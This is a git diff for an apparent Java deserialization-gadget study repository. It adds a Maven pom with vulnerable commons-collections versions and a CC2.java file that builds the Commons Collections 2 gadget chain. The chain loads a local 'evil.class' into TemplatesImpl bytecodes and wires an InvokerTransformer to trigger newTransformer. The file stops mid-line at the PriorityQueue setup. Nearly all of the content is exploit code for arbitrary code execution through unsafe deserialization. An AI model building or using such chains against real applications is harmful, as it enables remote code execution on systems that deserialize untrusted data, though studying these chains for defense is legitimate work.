diff --git a/README.md b/README.md
deleted file mode 100644
index 595aba8..0000000
--- a/README.md
+++ /dev/null
@@ -1,2 +0,0 @@
-# java_Gadgets
-java_Gadgets的记录
diff --git a/pom.xml b/pom.xml
new file mode 100644
index 0000000..c5ce4ce
--- /dev/null
+++ b/pom.xml
@@ -0,0 +1,56 @@
+
+ 4.0.0
+ org.example
+ newCC
+ war
+ 1.0-SNAPSHOT
+ newCC Maven Webapp
+ http://maven.apache.org
+
+
+ junit
+ junit
+ 3.8.1
+ test
+
+
+ commons-collections
+ commons-collections
+ 3.1
+
+
+ commons-collections
+ commons-collections
+ 3.2.1
+
+
+ org.apache.commons
+ commons-collections4
+ 4.4
+
+
+ org.javassist
+ javassist
+ 3.19.0-GA
+
+
+ concurrent
+ concurrent
+ 1.3.4
+
+
+
+ newCC
+
+
+ org.apache.maven.plugins
+ maven-compiler-plugin
+
+ 8
+ 8
+
+
+
+
+
diff --git a/src/main/java/cc/CC2.java b/src/main/java/cc/CC2.java
new file mode 100644
index 0000000..2eaa0e3
--- /dev/null
+++ b/src/main/java/cc/CC2.java
@@ -0,0 +1,43 @@
+package cc;
+
+import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
+import org.apache.commons.collections.functors.InvokerTransformer;
+import org.apache.commons.collections4.comparators.TransformingComparator;
+import org.apache.commons.collections4.functors.ConstantTransformer;
+
+import java.lang.reflect.Field;
+import java.nio.file.Files;
+import java.nio.file.Paths;
+import java.util.Base64;
+import java.util.PriorityQueue;
+
+public class CC2 {
+ public static void main(String[] args) throws Exception {
+ TemplatesImpl templates = new TemplatesImpl();
+ Class templatesClass = templates.getClass();
+ Field fieldname = templatesClass.getDeclaredField("_name");
+ fieldname.setAccessible(true);
+ fieldname.set(templates, "aaa");
+ Field bytecodesclass = templatesClass.getDeclaredField("_bytecodes");
+ bytecodesclass.setAccessible(true);
+
+ byte[] bytes = Files.readAllBytes(Paths.get("E:\\seecode\\FristTest\\target\\classes\\CC\\evil.class"));
+ String encode = Base64.getEncoder().encodeToString(bytes);
+ byte[] code = Base64.getDecoder().decode(encode);
+ byte[][] codes = {code};
+ bytecodesclass.set(templates, codes);
+
+ InvokerTransformer invokerTransformer = new InvokerTransformer("newTransformer", new Class[]{}, new Object[]{});
+ TransformingComparator transformingComparator = new TransformingComparator(new ConstantTransformer(1));
+
+ PriorityQueue